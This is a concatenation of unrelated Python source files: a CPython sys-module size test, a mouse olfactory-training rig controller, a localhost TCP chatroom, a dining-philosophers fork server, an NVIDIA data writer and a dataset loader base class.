check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def check_slots(self, obj, base, extra):
expected = sys.getsizeof(base) + struct.calcsize(extra)
if gc.is_tracked(obj) and not gc.is_tracked(base):
expected += self.gc_headsize
self.assertEqual(sys.getsizeof(obj), expected)
def test_slots(self):
# check all subclassable types defined in Objects/ that allow
# non-empty __slots__
check = self.check_slots
class BA(bytearray):
__slots__ = 'a', 'b', 'c'
check(BA(), bytearray(), '3P')
class D(dict):
__slots__ = 'a', 'b', 'c'
check(D(x=[]), {'x': []}, '3P')
class L(list):
__slots__ = 'a', 'b', 'c'
check(L(), [], '3P')
class S(set):
__slots__ = 'a', 'b', 'c'
check(S(), set(), '3P')
class FS(frozenset):
__slots__ = 'a', 'b', 'c'
check(FS(), frozenset(), '3P')
from collections import OrderedDict
class OD(OrderedDict):
__slots__ = 'a', 'b', 'c'
check(OD(x=[]), OrderedDict(x=[]), '3P')
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_asyncgen_hooks(self):
old = sys.get_asyncgen_hooks()
self.assertIsNone(old.firstiter)
self.assertIsNone(old.finalizer)
firstiter = lambda *a: None
sys.set_asyncgen_hooks(firstiter=firstiter)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, None)
self.assertIs(hooks[1], None)
finalizer = lambda *a: None
sys.set_asyncgen_hooks(finalizer=finalizer)
hooks = sys.get_asyncgen_hooks()
self.assertIs(hooks.firstiter, firstiter)
self.assertIs(hooks[0], firstiter)
self.assertIs(hooks.finalizer, finalizer)
self.assertIs(hooks[1], finalizer)
sys.set_asyncgen_hooks(*old)
cur = sys.get_asyncgen_hooks()
self.assertIsNone(cur.firstiter)
self.assertIsNone(cur.finalizer)
def test_changing_sys_stderr_and_removing_reference(self):
# If the default displayhook doesn't take a strong reference
# to sys.stderr the following code can crash. See bpo-43660
# for more details.
code = textwrap.dedent('''
import sys
class MyStderr:
def write(self, s):
sys.stderr = None
sys.stderr = MyStderr()
1/0
''')
rc, out, err = assert_python_failure('-c', code)
self.assertEqual(out, b"")
self.assertEqual(err, b"")
if __name__ == "__main__":
unittest.main()
|
fmos_trainer#2_odorassociation.py
|
'''
FMOS Trainer 2 - Freely Moving Olfactory Search - ODOR ASSOCIATION
Written: Teresa Findley, tmfindley15@gmail.com
Last Updated: 04.26.2021
--Records tracking data via OSC communication with custom code in Bonsai (open source computer vision software -- https://bonsai-rx.org/)
--Records signal data through NI USB-6009 data acquisition board
--Controls solenoid and beambreak hardware through Arduino Mega2560 & Teensyduino 2.0
'''
# [SET UP] #
##IMPORTS
##libraries
import numpy as np, cv2, os
import time, math, random, datetime
from timeit import default_timer as timer
import OSC, threading, Queue
import nidaqmx, ctypes
import matplotlib.pyplot as plt
from nidaqmx.constants import AcquisitionType, Edge
from nidaqmx.stream_readers import AnalogMultiChannelReader
##local modules
from fmos_preferences_bonsai import *
import fmos_datamgt, fmos_tracking, fmos_serial
##INITIATE VARIABLES
session_num = 1; trial_num = 1; state = 1;
port_val = leftport; leftcount = 0; rightcount = 0; nosepokecount = 0; msg = 0
last_occupancy = 0; section_occupancy = 0; concentration_setting = 0; response = 1; prep_odor = True; iti_delay = iti_correct; #trial information
correct0=0; total0=0; correct0L=0; total0L=0; correct0R=0; total0R=0;
odor_calibration = np.genfromtxt('D:/FMON_Project/data/olfactometercalibration.txt', delimiter = ',') #odor calibration array
datapath,session_num = fmos_datamgt.CHK_directory(mouse_id,group_name,session_num) #update/create datapath
trialsummary_file = datapath + 'trialsummary.txt'; video_file = datapath + 'videolocation.txt'
notes_file = datapath + 'notes.txt'
ch0_file = datapath + ch0 + '.dat'; ch1_file = datapath + ch1 + '.dat' #NI signal files
ch2_file = datapath + ch2 + '.dat'; ch3_file = datapath + ch3 + '.dat'
nx_file = datapath + 'nosex.dat'; ny_file = datapath + 'nosey.dat' #bonsai tracking files
hx_file = datapath + 'headx.dat'; hy_file = datapath + 'heady.dat'
cx_file = datapath + 'comx.dat'; cy_file = datapath + 'comy.dat'
ts_file = datapath + 'timestamp.dat'
receive_address = ('localhost', 6666); trackingcoords = OSC.OSCServer(receive_address); #bonsai tracking variables
qnosex = Queue.LifoQueue(0); qnosey = Queue.LifoQueue(0); #online position storage
nosex = np.zeros((1,1)); nosey = np.zeros((1,1));
headx = np.zeros((1,1)); heady = np.zeros((1,1))
comx = np.zeros((1,1)); comy = np.zeros((1,1))
ts = np.zeros((1,1));
signaldata = np.zeros((channel_num,buffersize),dtype=np.float64) #NI data collection reading variables
reader = AnalogMultiChannelReader(ni_data.in_stream)
##START UP PROCEDURES
section,section_center=fmos_tracking.calc_partitions() #online tracking: gridline delineation
fmos_serial.close_all_valves() #turn off all hardware
print 'error'
#Session Summary
#Create/Open Data Files
ch0_handle = open(ch0_file,'ab'); ch1_handle = open(ch1_file,'ab'); ch2_handle = open(ch2_file,'ab'); ch3_handle = open(ch3_file,'ab');
nx_handle = open(nx_file,'ab'); ny_handle = open(ny_file,'ab'); hx_handle = open(hx_file,'ab')
hy_handle = open(hy_file,'ab'); cx_handle = open(cx_file,'ab'); cy_handle = open(cy_file,'ab')
ts_handle = open(ts_file,'ab')
#Bonsai Start Up
trackingcoords.addDefaultHandlers() #add default handlers to the server
def msg_handler(addr, tags, coords, source):
qnosex.put(coords[0]); qnosey.put(coords[1]); #online storage of nose position
nosex[0,0] = coords[0]; nosey[0,0] = coords[1]
headx[0,0] = coords[2]; heady[0,0] = coords[3]
comx[0,0] = coords[4]; comy[0,0] = coords[5]
ts[0,0] = timer()-session_start;
nosex.tofile(nx_handle); nosey.tofile(ny_handle)
headx.tofile(hx_handle); heady.tofile(hy_handle)
comx.tofile(cx_handle); comy.tofile(cy_handle)
ts.tofile(ts_handle)
trackingcoords.addMsgHandler("/2python",msg_handler) #add msg handler function to server
bonsaitracking = threading.Thread( target = trackingcoords.serve_forever ) #put server in parallel thread
bonsaitracking.daemon = True
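# Note on the expected OSC payload (inferred from msg_handler above, not from the
# Bonsai workflow itself): each message to "/2python" on port 6666 should carry six
# floats in the order [nosex, nosey, headx, heady, comx, comy], one message per frame.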
#NI Set Up
ni_data.ai_channels.add_ai_voltage_chan(channels) #add channels to server
ni_data.timing.cfg_samp_clk_timing(samplingrate, '',Edge.RISING,AcquisitionType.CONTINUOUS,uInt64(buffersize)) #instruct how to sample
def ni_handler(): #define background function to handle incoming NI data
while True:
reader.read_many_sample(signaldata,number_of_samples_per_channel= buffersize, timeout=10.0)
signaldata[0,:].tofile(ch0_handle); signaldata[1,:].tofile(ch1_handle);
signaldata[2,:].tofile(ch2_handle); signaldata[3,:].tofile(ch3_handle);
nisignal = threading.Thread(target = ni_handler) #set handler function in background
nisignal.daemon = True
##INITIATE SESSION
print "Subject " + str(mouse_id) + ", Session " + str(session_num) #report session initiation
print "System Ready. Initiating Data Collection..."
session_start = timer() #session timer (set before the tracking thread starts so msg_handler can reference it)
bonsaitracking.start();
nose = [qnosex.get(),qnosey.get()];
ni_data.start(); nisignal.start(); #start data collection
localtime = datetime.datetime.now(); #stamp for video locator
print "Session Started."
# [MAIN CODE] #
while True:
# [State *](occurs in all states)
#Nosepoke & Timer
while ard.inWaiting() > 0: #check nosepoke status
msg = fmos_serial.nose_poke_status(msg)
if timer() - session_start >= session_length:
fmos_serial.close_all_valves()
reasonforend = "Auto Session End"
break
#Online Tracking
nose = [qnosex.get(),qnosey.get()]; #check nose position
section_occupancy = fmos_tracking.detect_mouse_partitions(nose,section_center,
section_occupancy) #section occupancy
if show_active_stats == True: #online trial statistics
frame = cv2.imread('D:/FMON_Project/data/statsbackground.jpeg')
height, width, depth = frame.shape #white background
fraction_correct = "Total: "+str(correct0)
fraction_left = "Left: "+str(correct0L)
fraction_right = "Right: "+str(correct0R)
#Stats Display
cv2.putText(frame,'Percent Correct', (130,(height/2)-40), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_correct, (80,(height/2)-20), cv2.FONT_HERSHEY_PLAIN, 1, (0,0,0))
cv2.putText(frame,fraction_left,(80,height/2),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.putText(frame,fraction_right,(80,(height/2)+20),cv2.FONT_HERSHEY_PLAIN,1,(0,0,0))
cv2.imshow('Session Statistics',frame)
##Manual Session Termination
if cv2.waitKey(1) & 0xFF == ord('q'):
fmos_serial.close_all_valves()
reasonforend = "Manual Exit"
break
# [State 1] TRIAL INITIATION
if state == 1:
if prep_odor == True:
low_valve, correctpoke,nameoftrialtype,correctindex,incorrectindex = fmos_datamgt.trial_values(port_val)
active_valve = 1
HairR,LairR,HairL,LairL,Hn2R,Ln2R,Hn2L,Ln2L,activevial,lowvial = fmos_serial.MFC_settings(concentration_setting,odor_calibration,active_valve)
if port_val == 1:
tnsy.write("MFC " + str(port_val) + " " + str(MFC_air) + " " + str(HairR) + "\r")
tnsy.write("MFC " + str(port_val) + " " + str(MFC_n2) + " " + str(Hn2R) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(LairL) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Ln2L) + "\r")
if port_val == 2:
tnsy.write("MFC " + str(port_val) + " " + str(MFC_air) + " " + str(HairL) + "\r")
tnsy.write("MFC " + str(port_val) + " " + str(MFC_n2) + " " + str(Hn2L) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(LairR) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Ln2R) + "\r")
tnsy.write("vialOn " + str(port_val) + " " + str(odor_vial) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(blank_vial) + "\r")
iti_timeout_start = math.floor(timer()) #start vial timer
prep_odor = False #odor has been decided
if (math.floor(timer()) >= math.floor(iti_timeout_start + iti_delay)): #vial mixing timer
if msg == 3:
tstart = timer() - session_start; #timestamp trial start (in ms)
tnsy.write("valve 2 " + str(low_valve) + " on\r") #turn on FVs
tnsy.write("valve " + str(low_valve) + " 1 on\r")
state = 2 #update trial variables
print("Trial " + str(trial_num) + " Activated: " + nameoftrialtype) #report trial start
# [State 2] TRIAL DECISION
if state == 2:
#Frame Count of Section Occupancy
if (section_occupancy == last_occupancy):
if (section_occupancy == correctindex):
counter = counter + 1
else: counter = 0; last_occupancy = section_occupancy
else: counter = 0; last_occupancy = section_occupancy
#Decision Status
if (counter == count_requirement):
print("Response registered: ") #report response
tnsy.write("valve 2 " + str(low_valve) + " off\r") #turn off final valves
tnsy.write("valve " + str(low_valve) + " 1 off\r")
state = 3; counter = 0; #update trial statistics
# [State 3] REWARD DELIVERY
if state == 3:
if port_val == leftport:
if msg == 2:
total0 = total0 + 1; total0L = total0L + 1; correct0 = correct0 + 1; correct0L = correct0L + 1
fmos_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmos_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = rightport #update trial variables
if port_val == rightport:
if msg == 1:
total0 = total0 + 1; total0R = total0R + 1; correct0 = correct0 + 1; correct0R = correct0R + 1
fmos_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmos_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = leftport #update trial variables
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
#Close All Data Files
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
##EXIT PROGRAM
fmos_serial.close_all_valves(); cv2.destroyAllWindows(); ard.close(); tnsy.close()
fraction_correct = "T: "+str(correct0)
fraction_left = "L: "+str(correct0L)
fraction_right = "R: "+str(correct0R)
print fraction_correct
print fraction_left
print fraction_right
performance_report = "Total Trials: " + str(correct0)
#Write Video Locator
fmos_datamgt.write_vidlocator(video_file,localtime)
fmos_datamgt.record_notes(notes_file,session_num,localtime,notepad,performance_report)
|
tcp-chatroom.py
|
import threading
import socket
host = '127.0.0.1'
port = 55555
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((host, port))
server.listen()
clients = []
nicknames = []
def broadcast(message):
for client in clients:
client.send(message)
def handle(client):
while True:
try:
message = client.recv(1024)
broadcast(message)
        except Exception:
index = clients.index(client)
clients.remove(client)
client.close()
nickname = nicknames[index]
broadcast(f'{nickname} has left the chat'.encode('ascii'))
nicknames.remove(nickname)
break
def receive():
while True:
client, address = server.accept()
print(f'Connected with {str(address)}')
client.send('Joon'.encode('ascii'))
nickname = client.recv(1024).decode('ascii')
nicknames.append(nickname)
clients.append(client)
        print(f'Nickname of the client is {nickname}')
broadcast(f'{nickname} joined the chat'.encode('ascii'))
client.send('Connected to the server'.encode('ascii'))
        thread = threading.Thread(target=handle, args=(client,))
thread.start()
print('Server is listening')
receive()
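# Minimal companion client (an illustrative sketch only; it assumes the handshake
# above, where the server first sends b'Joon' as a nickname prompt and afterwards
# relays plain ASCII messages to every connected client):
#
#     import socket, threading
#
#     sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     sock.connect(('127.0.0.1', 55555))
#
#     def listen():
#         while True:
#             message = sock.recv(1024).decode('ascii')
#             if message == 'Joon':          # nickname prompt from the server
#                 sock.send('my_nick'.encode('ascii'))
#             else:
#                 print(message)
#
#     threading.Thread(target=listen, daemon=True).start()
#     while True:
#         sock.send(input('> ').encode('ascii'))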
|
mfork.py
|
import socket
import pickle
from threading import Thread
import multiprocessing
import values
class Fork:
def __init__(self,index,host,port):
#ID of each fork process so that philosopher can address it by its index and
# it is easy to pass int message
self.id=index
#Assume that initially all forks are clean
self.is_dirty=False
#forks ip and port
self.host=host
self.port = port
#Each fork process is running at first
self.is_running=True
#-------------------------------METHODS----------------------------------------------
# Consider each fork as a thread. It will run in background
# Create TCP Socket connection. Each fork will act as a socket server
# Forks will receive message from Philosophers (TCP client)
# and send message about fork availability to philosophers
def enable(self):
try:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as exp:
print("Connection establishment problem " + str(exp))
try:
self.socket.bind((self.host, self.port))
except socket.error as exp:
print("socket bind problem " + str(exp))
self.socket.listen(0)
while self.is_running:
            connection, client_address = self.socket.accept()  # keep the client's address separate so self.host is not clobbered
            Thread(target=self.receive_data, args=(connection,)).start()
def pickfork(self,philosopher_request,connection):
if self.is_dirty:
sent_data = values.serialize([self.id, philosopher_request[0], values.ACTION_PICK_FORK, values.ACTION_FAIL])
connection.send(sent_data)
print("data received at philosopher : ",str(values.unserialize(sent_data)))
return False
else: # If fork is clean/not being used
self.is_dirty = True
self.current_philosopher = philosopher_request[0]
sent_data = self.serialize([self.id, self.current_philosopher, values.ACTION_PICK_FORK, values.ACTION_SUCCESS])
connection.send(sent_data)
print("data received at philosopher : ",str(values.unserialize(sent_data)))
return True
def dropfork(self,philosopher_request,connection):
# philosopher that was using the fork want to clean the dirty fork and put it down
# only the owner can put this fork down
if self.is_dirty and self.current_philosopher == philosopher_request[0]:
last_user = self.current_philosopher
            self.is_dirty = False #clean the fork
            self.current_philosopher = None #now the fork belongs to no one and either of the two adjacent philosophers can pick it
connection.send(values.serialize([self.id, last_user, 0, 1])) # let philosophers know the status of this fork
else:
connection.send(values.serialize([self.id, philosopher_request[0], 0, 0]))
def receive_data(self,connection):
while self.is_running:
try:
data = connection.recv(values.DATA_SIZE)
if data:
print("data from philosopher : "+str(values.unserialize(data)))
philosopher_request = values.unserialize(data)
if philosopher_request[1] == values.ACTION_PICK_FORK:
is_successful = self.pickfork(philosopher_request,connection)
if not is_successful:
break
elif philosopher_request[1] == values.ACTION_DROP_FORK:
self.dropfork(philosopher_request,connection)
break
except socket.error as e:
print("error getting data : " + str(e))
#connection.close()
connection.close()
def disable(self):
self.is_running = False
def deserialize(self,data):
return pickle.loads(data)
def serialize(self,data):
return pickle.dumps(data,protocol=2)
#--------------End Class --------------------------
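# Philosopher-side sketch (illustration only; ACTION_PICK_FORK, ACTION_SUCCESS and
# DATA_SIZE are assumed to be defined in the shared values module, as they are used
# above). A philosopher connects to a fork server, sends [philosopher_id, action],
# and reads back the [fork_id, philosopher_id, action, status] reply produced by
# pickfork/dropfork:
#
#     def request_fork(philosopher_id, fork_host, fork_port):
#         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#         sock.connect((fork_host, fork_port))
#         sock.send(values.serialize([philosopher_id, values.ACTION_PICK_FORK]))
#         reply = values.unserialize(sock.recv(values.DATA_SIZE))
#         sock.close()
#         return reply[3] == values.ACTION_SUCCESS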
def register_forks():
host = "localhost"
port = 4446
try:
msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msocket.sendto(values.serialize(["fork",port]),(values.MONITOR_IP,values.MONITOR_PORT2))
except socket.error as e:
print("Connection error 0: "+str(e))
try:
data, server = msocket.recvfrom(values.DATA_SIZE)
data_array = values.unserialize(data)
print(str(data_array))
return data_array
except socket.error as e:
print("Connection error 1: "+str(e))
finally:
msocket.close()
background_forks = []
def timeout(background_forks):
running = True
host = "localhost"
port = 4446
try:
msocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
msocket.sendto(values.serialize(["timeout",port]),(values.MONITOR_IP,values.MONITOR_PORT2))
except socket.error as e:
print("Connection error 0: "+str(e))
while running:
try:
data, server = msocket.recvfrom(values.DATA_SIZE)
data_array = values.unserialize(data)
for p in background_forks:
print("background forks terminated",p)
p.terminate()
running=False
except socket.error as e:
print("Connection error 1: "+str(e))
running=False
pass
def create_forks(data_array):
global background_forks
fork = Fork(data_array[0],data_array[1],data_array[2])
print(fork)
process = multiprocessing.Process(target=fork.enable,args=())
process.start()
background_forks.append(process)
process1 = multiprocessing.Process(target=timeout,args=(background_forks,))
process1.start()
if __name__ == "__main__":
try:
data_array = register_forks()
create_forks(data_array)
except KeyboardInterrupt:
for f in background_forks:
f.terminate()
|
writer.py
|
#
# Copyright (c) 2020, NVIDIA CORPORATION.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import math
import queue
import threading
import cupy as cp
import numpy as np
from cudf.utils.dtypes import is_list_dtype
from fsspec.core import get_fs_token_paths
from nvtx import annotate
class Writer:
def __init__(self):
pass
def add_data(self, gdf):
raise NotImplementedError()
def package_general_metadata(self):
raise NotImplementedError()
@classmethod
def write_general_metadata(cls, data, fs, out_dir):
raise NotImplementedError()
@classmethod
def write_special_metadata(cls, data, fs, out_dir):
raise NotImplementedError()
def close(self):
pass
class ThreadedWriter(Writer):
def __init__(
self,
out_dir,
num_out_files=30,
num_threads=0,
cats=None,
conts=None,
labels=None,
shuffle=None,
fs=None,
use_guid=False,
bytes_io=False,
):
# set variables
self.out_dir = out_dir
self.cats = cats
self.conts = conts
self.labels = labels
self.shuffle = shuffle
self.column_names = None
if labels and conts:
self.column_names = labels + conts
self.col_idx = {}
self.num_threads = num_threads
self.num_out_files = num_out_files
self.num_samples = [0] * num_out_files
self.data_paths = None
self.need_cal_col_names = True
self.use_guid = use_guid
self.bytes_io = bytes_io
# Resolve file system
self.fs = fs or get_fs_token_paths(str(out_dir))[0]
# Only use threading if num_threads > 1
self.queue = None
if self.num_threads > 1:
# create thread queue and locks
self.queue = queue.Queue(num_threads)
self.write_locks = [threading.Lock() for _ in range(num_out_files)]
            # sentinel signifying end-of-data, telling the worker threads to shut down
self._eod = object()
# create and start threads
for _ in range(num_threads):
write_thread = threading.Thread(target=self._write_thread, daemon=True)
write_thread.start()
def set_col_names(self, labels, cats, conts):
self.cats = cats
self.conts = conts
self.labels = labels
self.column_names = labels + conts
def _write_table(self, idx, data, has_list_column=False):
return
def _write_thread(self):
return
@annotate("add_data", color="orange", domain="nvt_python")
def add_data(self, gdf):
# Populate columns idxs
if not self.col_idx:
for i, x in enumerate(gdf.columns.values):
self.col_idx[str(x)] = i
# list columns in cudf don't currently support chunked writing in parquet.
# hack around this by just writing a single file with this partition
# this restriction can be removed once cudf supports chunked writing
# in parquet
if any(is_list_dtype(gdf[col].dtype) for col in gdf.columns):
self._write_table(0, gdf, True)
return
# Generate `ind` array to map each row to an output file.
# This approach is certainly more optimized for shuffling
# than it is for non-shuffling, but using a single code
# path is probably worth the (possible) minor overhead.
nrows = gdf.shape[0]
typ = np.min_scalar_type(nrows * 2)
if self.shuffle:
ind = cp.random.choice(cp.arange(self.num_out_files, dtype=typ), nrows)
else:
ind = cp.arange(nrows, dtype=typ)
cp.floor_divide(ind, math.ceil(nrows / self.num_out_files), out=ind)
for x, group in enumerate(
gdf.scatter_by_map(ind, map_size=self.num_out_files, keep_index=False)
):
self.num_samples[x] += len(group)
if self.num_threads > 1:
self.queue.put((x, group))
else:
self._write_table(x, group)
# wait for all writes to finish before exiting
# (so that we aren't using memory)
if self.num_threads > 1:
self.queue.join()
def package_general_metadata(self):
data = {}
if self.cats is None:
return data
data["data_paths"] = self.data_paths
data["file_stats"] = []
for i, path in enumerate(self.data_paths):
fn = path.split(self.fs.sep)[-1]
data["file_stats"].append({"file_name": fn, "num_rows": self.num_samples[i]})
# cats
data["cats"] = []
for c in self.cats:
data["cats"].append({"col_name": c, "index": self.col_idx[c]})
# conts
data["conts"] = []
for c in self.conts:
data["conts"].append({"col_name": c, "index": self.col_idx[c]})
# labels
data["labels"] = []
for c in self.labels:
data["labels"].append({"col_name": c, "index": self.col_idx[c]})
return data
@classmethod
def write_general_metadata(cls, data, fs, out_dir):
if not data:
return
data_paths = data.pop("data_paths", [])
num_out_files = len(data_paths)
# Write file_list
file_list_writer = fs.open(fs.sep.join([out_dir, "_file_list.txt"]), "w")
file_list_writer.write(str(num_out_files) + "\n")
for f in data_paths:
file_list_writer.write(f + "\n")
file_list_writer.close()
# Write metadata json
metadata_writer = fs.open(fs.sep.join([out_dir, "_metadata.json"]), "w")
json.dump(data, metadata_writer)
metadata_writer.close()
@classmethod
def write_special_metadata(cls, data, fs, out_dir):
pass
def _close_writers(self):
for writer in self.data_writers:
writer.close()
return None
def close(self):
if self.num_threads > 1:
# wake up all the worker threads and signal for them to exit
for _ in range(self.num_threads):
self.queue.put(self._eod)
# wait for pending writes to finish
self.queue.join()
# Close writers and collect various metadata
_general_meta = self.package_general_metadata()
_special_meta = self._close_writers()
        # Move in-memory file to disk
if self.bytes_io:
self._bytesio_to_disk()
return _general_meta, _special_meta
def _bytesio_to_disk(self):
raise NotImplementedError("In-memory buffering/shuffling not implemented for this format.")
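if __name__ == "__main__":
    # Illustration only (not part of the library): mirror the row-to-output-file
    # mapping built in ThreadedWriter.add_data with plain numpy instead of cupy,
    # purely to make the non-shuffled partitioning logic easy to inspect.
    nrows, num_out_files = 10, 3
    typ = np.min_scalar_type(nrows * 2)
    ind = np.arange(nrows, dtype=typ)
    np.floor_divide(ind, math.ceil(nrows / num_out_files), out=ind)
    # Row i is routed to output file ind[i]; here ind == [0 0 0 0 1 1 1 1 2 2].
    print(ind)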
|
data.py
|
import threading
from functools import wraps
from abc import ABCMeta, abstractmethod
import numpy as np
class DatasetSplit(object):
"""Represent a dataset split such as training or validation. Is meant to
be used as an organized dictionary to help BaseDataLoader
"""
def __init__(self, name, filepaths):
self.name, self.filepaths = name, filepaths
self.n_files = len(self.filepaths)
self.file_shuffle = list(range(self.n_files))
self.file_cursor = 0
self.next, self.current = None, None
self.current_len, self.current_index_shuffle, self.cursor = 0, [0], 0
self.did_load_first_megabatch = False
self.thread = None
class BaseDataLoader(object, metaclass=ABCMeta):
"""All data loaders should inherit from this one. This provides common
functionality for parallel data loading. The children must implement
the interface of abstractmethods.
When inheriting, remember to give your child a name
"""
def __init__(self, hps, data_directory):
# check if children are not messing up
if not hasattr(self, "name"):
raise Exception("You must give your data loader a reference name")
self.hps = hps if isinstance(hps, dict) else dict(hps.values())
self.data_directory = data_directory
self.splits = self.get_data_splits()
self.splits = {split.name: split for split in self.splits}
for s, split in self.splits.items():
split.file_cursor = 0
split.file_shuffle = self.reshuffle_file_indices(s, split.filepaths)
selected_file = split.filepaths[split.file_shuffle[split.file_cursor]]
split.thread = threading.Thread(
target=self.load_next_megabatch, args=(s, selected_file))
split.thread.start()
# debug
# split.thread.join()
@classmethod
def parse_hparams(cls, params):
"""Overrides the default sets of parameters.
It is done this way so that the caller can save those parameters
however they want to
"""
hps = cls.default_hparams()
if params is not None:
hps = hps.parse(params)
return hps
def check_if_split_is_ready(function):
"""Decorator to check if the first megabatch of data was loaded
from the chosen split. This is useful for every function that uses
the splits directly
"""
@wraps(function)
def wrapper(inst, split_name, *args, **kwargs):
if not inst.splits[split_name].did_load_first_megabatch:
inst.splits[split_name].did_load_first_megabatch = True
inst._swap_used_set_for_preloaded_one(split_name)
return function(inst, split_name, *args, **kwargs)
return wrapper
def _swap_used_set_for_preloaded_one(self, split_name):
split = self.splits[split_name]
# swap the megabatches
split.thread.join()
split.current = split.next
# shuffle indices (or not, it is the child's choice)
split.current_index_shuffle = self.reshuffle_sample_indices(split_name, split.current)
split.current_len = len(split.current_index_shuffle)
# advance file cursor and check if we finished the split
split.file_cursor += 1
did_run_through_all_data = split.file_cursor == split.n_files
if did_run_through_all_data:
split.file_cursor = 0
split.file_shuffle = self.reshuffle_file_indices(split_name, split.filepaths)
selected_file = split.filepaths[split.file_shuffle[split.file_cursor]]
# only load next megabatch if there is more than one to load
if split.n_files > 1:
print("[INFO] Swapped data megabatches for split {}".format(split_name))
split.thread = threading.Thread(
target=self.load_next_megabatch, args=(split_name, selected_file))
split.thread.start()
self.did_swap_megabatches(split)
return did_run_through_all_data
def set_future_data_for_split(self, split_name, data):
"""Set next data megabatch for given split. This method must be used
by the child in load_next_megabatch to guarantee proper functioning
of the parallel loading scheme
"""
self.splits[split_name].next = data
def sample_iterator(self, split_name, batch_size):
"""Iterate through the current index shuffle of the selected split.
This index shuffle is a list of indexes that reference the current
loaded file for the split.
This iterator can stop for either returning a full batch of indices,
or because the split itself was finished (all its files were read
to completion). The reason is indicated by iterator_status, returned
on every iteration
"""
iterator_status = 'running'
counter = 0
while iterator_status == 'running':
# check for end_of_batch, notice that the end_of_split status
# takes priority as it is set later
counter += 1
iterator_status = 'end_of_batch' if counter >= batch_size else 'running'
# swap files if we reached the end of the current one
if self.splits[split_name].cursor >= self.splits[split_name].current_len:
end_of_split = self._swap_used_set_for_preloaded_one(split_name)
iterator_status = 'end_of_split' if end_of_split else iterator_status
self.splits[split_name].cursor = 0
# get the current place in the split (the cursor)
cursor = self.splits[split_name].current_index_shuffle[self.splits[split_name].cursor]
self.splits[split_name].cursor += 1
yield cursor, iterator_status
@check_if_split_is_ready
def batch_iterator(self, split_name, batch_size, stop_at_end_of_split):
"""Iterate through batches of samples in selected split (split_name).
This will use the get_sample function on the child to obtain each
sample.
:param split_name: The selected split (one of those returned by
get_data_splits)
:param batch_size: Each batch will have this number of samples or
less (if we reach end of split)
        :param stop_at_end_of_split: Indicates whether the iterator stops at
end of split (e.g. for eval on test sets) or keeps running forever
(e.g. for training)
:return: a python generator that yields (batch_size, *sample) arrays
"""
iterator_status = 'running'
while not stop_at_end_of_split or not iterator_status == 'end_of_split':
samples = []
for idx, iterator_status in self.sample_iterator(split_name, batch_size):
sample = self.get_sample(self.splits[split_name].current, idx)
for i, element in enumerate(sample):
if len(samples) == i:
samples.append([element])
else:
samples[i].append(element)
samples = [np.array(element) for element in samples]
yield self.preprocess_batch(samples)
@check_if_split_is_ready
def get_n_samples_from(self, split_name, n, shuffled=False, seeded=None, preprocess=False):
"""Get n samples from current loaded file of selected split
:param split_name: The selected split (one of those returned by
get_data_splits)
:param n: number of samples the user wants returned
        :param shuffled: to shuffle or not to shuffle indices
        :param seeded: if not None, should return the same n samples every call,
with the disclaimer that for a split that is written over many
files, this will only guarantee the same samples for the same
loaded file
:return: a (n, *sample) array
"""
if seeded is not None:
np.random.seed(int(seeded))
if shuffled:
indices = np.random.permutation(self.splits[split_name].current_len)[:n]
else:
indices = list(range(n))
if seeded is not None:
np.random.seed()
samples = []
for idx in indices:
sample = self.get_sample(self.splits[split_name].current, idx)
for i, element in enumerate(sample):
if len(samples) == i:
samples.append([element])
else:
samples[i].append(element)
samples = [np.array(element) for element in samples]
if preprocess:
return self.preprocess_batch(samples)
else:
return samples
@check_if_split_is_ready
def get_n_samples_batch_iterator_from(self, split_name, n, batch_size, shuffled=False, seeded=None, preprocess=False):
"""Get n samples from current loaded file of selected split
:param split_name: The selected split (one of those returned by
get_data_splits)
:param n: number of samples the user wants returned
